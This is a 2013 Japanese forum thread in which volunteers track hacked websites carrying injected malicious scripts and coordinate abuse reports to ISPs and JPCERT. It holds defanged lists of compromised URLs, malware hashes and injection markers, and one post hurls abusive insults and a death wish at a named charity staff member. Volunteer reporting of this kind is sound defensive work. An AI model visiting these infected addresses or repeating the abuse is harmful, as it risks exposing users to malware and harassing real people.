www.google.co.jp/search?hl=ja&source=hp&q=site%3Awww.znet.ne.jp%2Fmsd%2F&btnG=Google+%E6%A4%9C%E7%B4%A2&gbv=1
171:名無しさん@お腹いっぱい。
13/06/23 12:50:17.93 .net
>>169
>>167 ⑧のやつ
jsunpack
411eac06a7475cdd11450051ca075fdc17594caf
virustotal
www.virustotal.com/ja/url/7362a2240ccdabcebe7ad4cb0e90512da40669fbe56bb8b881564610d49f2f4e/analysis/1371959125/
www.virustotal.com/ja/file/9da5a899b9d55e1d43718ec0ad6368f9e9ef0242a4e88cd5ddb2cc6d7bfa5fb3/analysis/1371830823/
172:名無しさん@お腹いっぱい。
13/06/23 15:46:44.85 .net
znetはコンピュータソフト開発のパティオシステムズですね。
どうりで最近三重県ばかりが何故多いのかと思ってた。
173:/名無しさん[1-30] ◆.htmlint.U
13/06/23 16:05:53.47 .net
お疲れ様です。
166の三番目みます
174:名無しさん@お腹いっぱい。
13/06/23 18:05:02.83 .net
病理ウイルスも、パンデミックを通り越して常態化した場合は個人の体力や免疫に頼るしかないように
コンピュータウイルスも、脆弱性の無い最新の環境(新しいPC、最新のOS)を整えるしかないのでしょう
w7が出る前のガンブラー騒動、w8.1が出る直前の今回
タイミング的にもやはり、マイクロソフトの販促キャンペーンでしょうかw
166の③はおそらく
<!--0c0896--> から
<!--/0c0896--> まで
www.virustotal.com/ja/file/e4422ac4ca9fafa8110127ddfff298f9f78065f336dafaacaf8ce9db294a03f1/analysis/1371976952/
窓口が休みなので月曜以降にフローを確認してから
175:/名無しさん[1-30] ◆.htmlint.U
13/06/23 18:41:03.37 .net
>>173
ど-ん
フォームはlynx使ってみた。
ちょん切れちゃった。。。orz.......
>>174
んだなす
176:/名無しさん[1-30] ◆.htmlint.U
13/06/23 18:55:19.07 .net
167の八番目みます
applet archive="otxUB.jar"
177:/名無しさん[1-30] ◆.htmlint.U
13/06/23 19:31:22.94 .net
>>176
とりあえずベンダーに送付
なんか他にもありそう……
178:/名無しさん[1-30] ◆.htmlint.U
13/06/23 20:02:02.99 .net
めも
URLリンク(wepawet.iseclab.org)
Hash
52390e6a6c74db94eb86c72034328989
URLリンク(www.virustotal.com)
SHA256: fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501
SHA1: 9c702e0865b1be8fbfa743bcb7fea45bcc09bf87
MD5: 52390e6a6c74db94eb86c72034328989
File size: 336.9 KB ( 345005 bytes )
現時点404
179:/名無しさん[1-30] ◆.htmlint.U
13/06/23 20:22:44.68 .net
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
SPAM扱いされて、いくつかベンダーに届かないでやんよ>>177
180:コテハン ◆8080adndqg
13/06/24 14:33:41.86 .net
>>170
www.google.com/safebrowsing/diagnostic?site=www.znet.ne.jp/msd/&hl=ja
検索結果を見ると…
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
\(^o^)/ハジマタwww
181:名無しさん@お腹いっぱい。
13/06/24 16:05:22.36 .net
スレリンク(sec板:329番) 誤爆orz
>>166
③ 完了
ドメイン管理=ステージグループ(ホームページ制作)ここの対応も優
>>168
① 一応完了※但し、馬鹿過ぎて話にならず
②完了
クレアトゥール 福井 ← そもそも電話に出ないので上流へ電話
→ GMOインターネット株式会社
③一応完了
残念な人達の様なので無理ぽ
④ 一応完了
残念な人達の様なので無理ぽ
⑤ 完了
NPO法人 一隅を照らす会の馬鹿女に伝えておきました
ドブス馬鹿女へ、 関係ないなら何故閉鎖するのか、死ね!
182:名無しさん@お腹いっぱい。
13/06/24 16:42:17.94 .net
>>180
znet.ne.jp は禿にリダイレクトされてるもより
これで対応したつもりなんでしょ
183:/名無しさん[1-30] ◆.htmlint.U
13/06/24 19:55:16.33 .net
オツカレサマデス
こちらの環境では>168の五番目がぁぅぁぅのままだったので鯖管にめるしました。
フォームでは漏れのめあど蹴られちゃう
184:名無しさん@お腹いっぱい。
13/06/24 20:54:54.40 .net
>>183
>>183
ドブス馬鹿女が一旦閉鎖した後、一時間程で再開しくさったのです
185:/名無しさん[1-30] ◆.htmlint.U
13/06/24 22:22:08.12 .net
saitoadobaizanikisaishimasuta
186:コテハン ◆8080adndqg
13/06/25 00:49:11.01 .net
>>181-185
乙カレー
www●fukushima-l●com/forrent/
www●nifa●co●jp/
www●guitaristlip●com/
www●moonshot●co●jp/
www●montessori-japan●com/
消えてもらったほうがいいようなサイト
rockbook01●awe●jp/dekome/
187:/名無しさん[1-30] ◆.htmlint.U
13/06/25 01:08:43.64 .net
【忍者ホームページ】ホームページの改ざん被害にご注意下さい ※要確認※|お知らせ|忍者ツールズ
URLリンク(www.ninja.co.jp)
間に合うかな? 時間がキビシーのもあって
>>186の一番目だけみます
とっぷからぁうぁう
188:/名無しさん[1-30] ◆.htmlint.U
13/06/25 03:16:28.69 .net
>>187
どーん
結構根が深かった……
189:名無しさん@お腹いっぱい。
13/06/25 18:07:52.36 .net
>>186
①サイト所有会社に電話連絡完了(すでに把握していたもより)
②パス(対応済みと思われ)
③OCNフォーム発射完了
④サイト所有会社に電話連絡完了
⑤サイト所有会社に電話連絡完了
⑥デジロックは放置(そもそも無理ぽ)
※デジロック以外は全力で対応
いずれweb改ざんの元凶はデジロックであるとして
司直の手により殲滅
190:名無しさん@お腹いっぱい。
13/06/25 21:15:55.96 .net
www12●ocn●ne●jp/~kabanos/
www7●ocn●ne●jp/~takara3/
www10●ocn●ne●jp/~clubpome/
www6●ocn●ne●jp/~ohisama1/
www5●ocn●ne●jp/~yukio●ok/
www13●ocn●ne●jp/~touki/
www17●ocn●ne●jp/~bonsai/
www2●ocn●ne●jp/~kikikm/
191:名無しさん@お腹いっぱい。
13/06/26 02:38:52.58 .net
>>190
OCNフォーム発射完了
192:オルティス・ジャパン
13/06/26 17:24:25.51 .net
バリュードメインvalue-domain.com(デジロック)正規フロー窓口を聞き出しました
www.value-domain.com/webabuse.php
↑の一番下にフォームがあります
>>186⑥
フォーム発射完了
対応されるかtest
193:/名無しさん[1-30] ◆.htmlint.U
13/06/28 02:35:14.54 .net
>>186の2番目
JSとかぁぅぁぅ
さいとあどばいざにきさいしますた
ntt.netはあぶせにめるだけでいいのかな?
>>183
鯖管から対応かんりょのお返事いただきました
上流になるのかな?>鯖管
194:名無しさん@お腹いっぱい。
13/06/28 17:30:48.73 .net
>>193
>>>186の2番目
./common/js/thickbox.js ./common/js/jquery.fontScaler.js"他いっぱい確認しました
www.virustotal.com/ja/file/15652cb5a2c3ec3abecd5530c2615cd863f1fa633a8878a434b43c196082ed11/analysis/1372406516/
トップの0112722100にお知らせしましたが、HPを製作した委託先とは切れていて分かる人はいないそうです
jpサートとIPAの相談電番を案内してみました
>>>183
>鯖管から対応かんりょのお返事いただきました
乙です
>上流になるのかな?>鯖管
ジャマイカ
195:/名無しさん[1-30] ◆.htmlint.U
13/06/28 21:35:29.46 .net
>>194
お疲れ様ですお疲れ様です
んでも>>186の2番目、今の時点でぃれくとりぃぐゎ(ry
なぜん?
196:名無しさん@お腹いっぱい。
13/06/28 21:48:00.85 .net
21:00からですん
以前の委託先に緊急連絡したんでしょ
そんなんかな
ついでに言わしちくり
やられたでござる←むかつくねん
197:/名無しさん[1-30] ◆.htmlint.U
13/06/28 22:48:35.98 .net
りねーむすてるん。なんか公開修正みたいな木が汁
ご愁傷様 > やられたでござる
198:名無しさん@お腹いっぱい。
13/06/28 23:11:17.35 .net
話題のwww●nifa●co●jp/
2013XXXXCopy_of_info.php
2013XXXXCopy_of_index.php
コードそのまま引きずってるとか・・
なんだよこれww
もしかして露出狂?
199:/名無しさん[1-30] ◆.htmlint.U
13/06/29 02:50:14.38 .net
別件
> Google セーフ ブラウジング
>
> 内容を送信しました
>
> Google にご報告いただきありがとうございます。これで報告は完了です。よろしければこちらもご覧ください。
>
> 1. ウェブ環境の安全性向上に貢献したご自分の功績を、しばしの間称えてあげましょう。
>
> 2. ウェブブラウザが最新バージョンであり、使用しているオペレーティング システムに最新のパッチが適用されていることを確認しましょう。
>
> 3. Stopbadware.org にアクセスしてパソコンに感染する可能性のあるマルウェアの詳細について確認しましょう。
超ネムイのでこくまで……
つかぐぐるにBlockされっぱなし。。。orz...........
200:名無しさん@お腹いっぱい。
13/06/29 08:23:05.72 .net
www4●ocn●ne●jp/~sawa/get-novel●htm
www4●ocn●ne●jp/~kiyotomo
chiyoichi●com/
www●h-seiken●co●jp
art-tokugawa●com
vol1●co●jp
auseiki●com/
www●okamoto-denki●co●jp/
201:名無しさん@お腹いっぱい。
13/06/29 10:52:17.04 .net
>>200
①②③④⑤⑥⑦⑧OCNフォーム発射完了
⑥>>155① 又貸ししてると無理らしいが、リベンジ
⑧テスト的に岡本電気工業株式会社に連絡してみました
202:名無しさん@お腹いっぱい。
13/07/03 NY:AN:NY.AN .net
>>194さま
6/28 WEB改ざんに関して丁重にご指導して頂きまして、ありがとうございました。
おかげさまで、ホームページを復旧させることができましたことをこの場をお借りしてご報告させて頂きます。
また、教えて頂いた対策を一通り行いました。
今後は、発見される脆弱部のアップデートと、改ざんされた際の早急な対応を心がけていきたいと思います。
ご教授して頂いたことに深く感謝申し上げます。
203:名無しさん@お腹いっぱい。
13/07/03 NY:AN:NY.AN .net
>>110,120,146,153
追加
ウェブサイト改ざんの増加に関する一般利用者(ウェブ閲覧者)向け注意喚起
www.ipa.go.jp/security/topics/alert20130626.html
相次ぐWeb改ざん、原因はまたもや“Gumblar”か
itpro.nikkeibp.co.jp/article/NEWS/20130702/488823/
Web改ざん検知と脆弱性診断をセットにした「BIGLOBE Webホスティング セキュリティセット」
提供開始~8月30日までのご契約で3カ月無料キャンペーンを実施~
www.sankeibiz.jp/business/news/130701/prl1307011548082-n1.htm
>>202
セキュ板の集合知の為せる業です
わざわざ最果ての過疎地へ報告どもですー
204:/名無しさん[1-30] ◆.htmlint.U
13/07/03 NY:AN:NY.AN .net
同じ日に取材なのね
急増するWebサイト改ざん、原因は「ガンブラー」か :日本経済新聞
URLリンク(www.nikkei.com)
なんでもかんでも「ガンブラー」ってのには無理があるような>報道論調
まだところどころでぃれくとりぃぐゎ>>197
205:名無しさん@お腹いっぱい。
13/07/03 NY:AN:NY.AN .net
まあ既存の何かと似たものがあればそれに例えたほうがわかりやすいからね
206:名無しさん@お腹いっぱい。
13/07/04 NY:AN:NY.AN .net
・ω・
207:/名無しさん[1-30] ◆.htmlint.U
13/07/04 NY:AN:NY.AN .net
Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT
81a338確認
208:/名無しさん[1-30] ◆.htmlint.U
13/07/04 NY:AN:NY.AN .net
URLリンク(www.virustotal.com)
20 / 47
209:/名無しさん[1-30] ◆.htmlint.U
13/07/05 NY:AN:NY.AN .net
>>207-208
鯖管に凸
さいとアドバイザのばぐやろー!!!!!!!!!!!!!!!!!!!!!!
210:/名無しさん[1-30] ◆.htmlint.U
13/07/05 NY:AN:NY.AN .net
ベターまたはベストに近いロータリー
国際ロータリー第2830地区 WEBサイト不正改ざんの概要及びサーバー復旧のご報告.pdf
URLリンク(docs.google.com)
URLリンク(www.google.co.jp)
不正アクセスによる各クラブの被害状況(詳細).pdf - 国際ロータリー第2830地区 「レンタルサーバー(rotary-aomori.org)への不正アクセスによるデータ改ざん等の被害状況」
URLリンク(docs.google.com)
URLリンク(www.google.co.jp)
サーバーの複数管理による改竄被害は不可避に近い状況なぬで、バッサリした判断・対応は賞賛に値すると漏れは思ふ。
211:/名無しさん[1-30] ◆.htmlint.U
13/07/05 NY:AN:NY.AN .net
書き忘れ
>>207-208
対応済み
お疲れ様です。>鯖管様
212:名無しさん@お腹いっぱい。
13/07/07 NY:AN:NY.AN .net
www●gakysyuu●jp/hutyuu●html
ぐぐるが警告してるが私には分からないのでm(__)m
213:/名無しさん[1-30] ◆.htmlint.U
13/07/10 NY:AN:NY.AN .net
(2013/07/10 9:40), JPCERT/CC wrote:
> --------- This is an automatic email from JPCERT/CC. ---------
>
> We would like to acknowledge the receipt of your incident report.
>
> Your incident report will be handled based on our policy. In certain
> situations, we may forward your report to the corresponding
> person/parties in a coordinated manner. Please promptly inform us if
> you do not wish to have your report forwarded.
>
> If you are not the appropriate person to receive this email, please
> disregard this message.
>
> Please feel free to contact us for further questions or comments.
>
> Best regards,
>>192
403
昨日、別件で#0c0896を確認
↑は検体送付の受理返信。一部詳細はさいとあどばいざに
URLリンク(megalodon.jp)
やったこと、ばりゅどめと親会社のGMOにつーほ
>>212
こちらの環境ではわからなかったん
くいんしーじょーんずぁゃゃにちかまつもんざぇもんでどぞー
はっぽーしゅうんめぇ
214:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
Web閲覧でのマルウェア検知が日本で急増、カスペルスキーが注意喚起
www.itmedia.co.jp/enterprise/articles/1307/05/news082.html
>7月1日以降は減少している
とりあえず収束かな
二ヶ月くらいはのんびり出来るかな
215:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
www1●ocn●ne●jp/~aoyamaco/
www1●ocn●ne●jp/~blitz/
www1●ocn●ne●jp/~satou●mc/
www1●ocn●ne●jp/~tei-teru/
www10●ocn●ne●jp/~kerotyan/
www10●ocn●ne●jp/~win-now/
216:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
1ヶ月の第1週に改竄のピークが有り、100サイト位は毎日改竄されているような
状況なので、減ったなんて言えないのではないかな。
217:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
www12●ocn●ne●jp/~act53/
www15●ocn●ne●jp/~asla/
www16●ocn●ne●jp/~kaigo-ok/
www2●ocn●ne●jp/~mi-yoshi/
www3●ocn●ne●jp/~kougetsu/
www3●ocn●ne●jp/~nml/
218:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
>>216
ガ━━━∑(゚д゚lll)━━━ン
219:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
www4●ocn●ne●jp/~a-6118/
www5●ocn●ne●jp/~camel/
www5●ocn●ne●jp/~kcoreyge/
www5●ocn●ne●jp/~zaitack/
www6●ocn●ne●jp/~kmkk/
www6●ocn●ne●jp/~onodensh/
www7●ocn●ne●jp/~ecoromy/
www8●ocn●ne●jp/~dutchrek/
www8●ocn●ne●jp/~ruah/
ds-sinjo●co●jp
www●raisu●co●jp
tt-ins●co●jp/
220:名無しさん@お腹いっぱい。
13/07/10 NY:AN:NY.AN .net
>>215
ocnフォーム発射完了
>>217
ocnフォーム発射完了
>>219
①-⑨⑪⑫
ocnフォーム発射完了
>>219
⑩
どうしましょうね
明日考えますね
221:名無しさん@お腹いっぱい。
13/07/11 NY:AN:NY.AN .net
>>219
⑩
ocnフォーム発射完了&対応出来るのかを確認中
更に、ドコモからショップへ連絡の段取り完了
222:名無しさん@お腹いっぱい。
13/07/12 NY:AN:NY.AN .net
>>221
ocnセキュリティから回答あり
ocnフォームでは受けられないもより
別経由でverio の窓口を聞き出しました
inquiries@verio.jp
力尽きたので放置
ドコモ神奈川総務さん、がんばって
使用ブラウザがwindwsと言い張るドコモショップ新城店の相手は私には無理
223:/名無しさん[1-30] ◆.htmlint.U
13/07/13 NY:AN:NY.AN .net
っ URLリンク(www.virustotal.com)
224:オルティス・ジャパン
13/07/13 NY:AN:NY.AN .net
>>222
担当窓口はso-net法人向け窓口
当該ドメインはメールサーバーのもので作ったのはソネット、とDSは主張しています
昨日、DSサイドからソネットに問い合わせしたところ
改ざんはなく問題ないと回答したとのこと…
と、DSは主張しています
私がソネットに問い合わせしたところ、会員以外の問い合わせには応じられないと電話を切られました(笑
ウイルスに感染したとしても責任は取らないそうです
月曜以降に別の窓口に問い合わせする予定です
余談ですが、改ざんコードが
難読が解かれた不正な iframe に変更されてます
Kaspersky で検出できる様なのでDSにカスペルスキーを導入して貰うのも有りかと
225:名無しさん@お腹いっぱい。
13/07/13 NY:AN:NY.AN .net
www12●ocn●ne●jp/~dz577-91/
www13●ocn●ne●jp/~smile-cd/
www3●ocn●ne●jp/~nml/
www3●ocn●ne●jp/~skk-west/
226:名無しさん@お腹いっぱい。
13/07/13 NY:AN:NY.AN .net
>>225
①②
ocnフォーム発射完了
③ → >>217⑥ リベンジ
ocnフォーム発射完了
④対応されてるもより
227:/名無しさん[1-30] ◆.htmlint.U
13/07/13 NY:AN:NY.AN .net
>>223 (2013/07/13 0:15),
> Greetings from the NTT Communications Global IP Network Security Team,
>
> This is an automated reply to inform you that we have received your e-mail
> regarding an alleged violation of our Acceptable Use Policy by a customer
> of NTT Communications.
>
> If your issue involves unsolicited commercial e-mail, please reply to us
> with the entire unsolicited e-mail with complete headers if you have not
> already done so. Please limit your e-mail to essential information that
> would help us with investigating the incident. Personal commentary may
> delay the processing of your request.
>
> Please be advised that we can only address abuse issues regarding NTT
> Communications customers. Spam and/or abuse issues involving non-NTT
> Communications customers need to be reported to the Abuse address of the
> originating domain or service provider for proper handling and disposition.
> Please be aware that it is common for spam and Usenet abuse to be generated
> with false or manipulated return addresses, thus the issue may not involve
> NTT Communications or its customers. Please look at the full header
> information, including the received lines, to determine the true origin of
> the e-mail. For Usenet, you can use the 'NNTP posting host' IP address or
> hostname.
>
> We appreciate the time you have taken to report the alleged abuse, however
> due to the volume of e-mails we receive, we are not able to respond
> personally to each complaint received.
[省略]
ntt.netのabuseからは自動返信きてた
>>225-226
お疲れ様です。
228:/名無しさん[1-30] ◆.htmlint.U
13/07/13 NY:AN:NY.AN .net
memo>>223
URLリンク(megalodon.jp)
URLリンク(megalodon.jp)
URLリンク(megalodon.jp)
URLリンク(megalodon.jp)
> infected with JS.IFrame.425
URLリンク(www.virustotal.com:443)">URLリンク(megalodon.jp))
URLリンク(www.virustotal.com:443)">URLリンク(megalodon.jp))
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
229:名無しさん@お腹いっぱい。
13/07/13 NY:AN:NY.AN .net
sinei-kitchen●com/
kyoei-medical-o2●co●jp
fruits-lunch●com/
aomoriya●jp/basic●js
www12●big●or●jp/~zero-one/
www2●big●or●jp/~zero-one/
www22●big●or●jp/~zero-one/
230:名無しさん@お腹いっぱい。
13/07/13 NY:AN:NY.AN .net
>>229
①②③
FirstServer正規フロー窓口↓
supportorder.fsv.jp/form/toiawase_input.aspx ← フォームから対応されるかtest
フォーム発射完了
④⑤⑥⑦
月曜以降に正規フローを確認した後に(お盆なので時間が掛かるかも)
231:名無しさん@お腹いっぱい。
13/07/13 NY:AN:NY.AN .net
>>203,214
追加
www.npa.go.jp/cyberpolice/detect/pdf/20130626.pdf
winXPは更新しても脆弱性は解消されない方向にあるんじゃなかろうかと思われるのですが
警察庁は低能集団ですかw
232:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>231
OSかえろってのは経済的な問題も出てくるので残念ながら非現実的
ユーザーが自力で持続可能な範囲で基本的な対応を促すしかないんじゃないかと
知り合いに対してでもいきなりPC変えろとは言い難いし
233:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>232
・個人が趣味でホームページをもっている場合、趣味であるならお金は惜しまないはず
・企業である場合、企業なら金は惜しむべきではないでしょう
新しいOSの乗ったPC5万有れば買えます
分割でもいいでしょう
ホームページを持たずに趣味でPCを使っているだけならいざしらず
不特定多数が閲覧するホームページを所有するなら必要不可欠な出費であると覚悟するべきでしょ
234:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>233
>>231のは閲覧側の注意喚起じゃん
235:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>234
web改ざんされないための注意喚起でもあります
236:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
サイト所有者が>>231を真に受け「最新の状態に更新してるからおkじゃん」と錯誤させることが問題なのです
237:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
n-sagami●com/ryoko/ryoko1●html
sanyogiken-gp●co●jp/
nature-nail●com/
m-filled●com/
238:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>237
ocnフォーム発射完了
239:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
ここも全く対応しない
aiweb●or●jp/nagoya-handbag/
240:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
インターネット三重 プロバイダが感染!
三重に感染が多いのはこういうところが感染しているからなのでしょう
inetmie.or.jp/
241:名無しさん@お腹いっぱい。
13/07/14 NY:AN:NY.AN .net
>>239
ocnフォーム発射完了
>>240
明日以降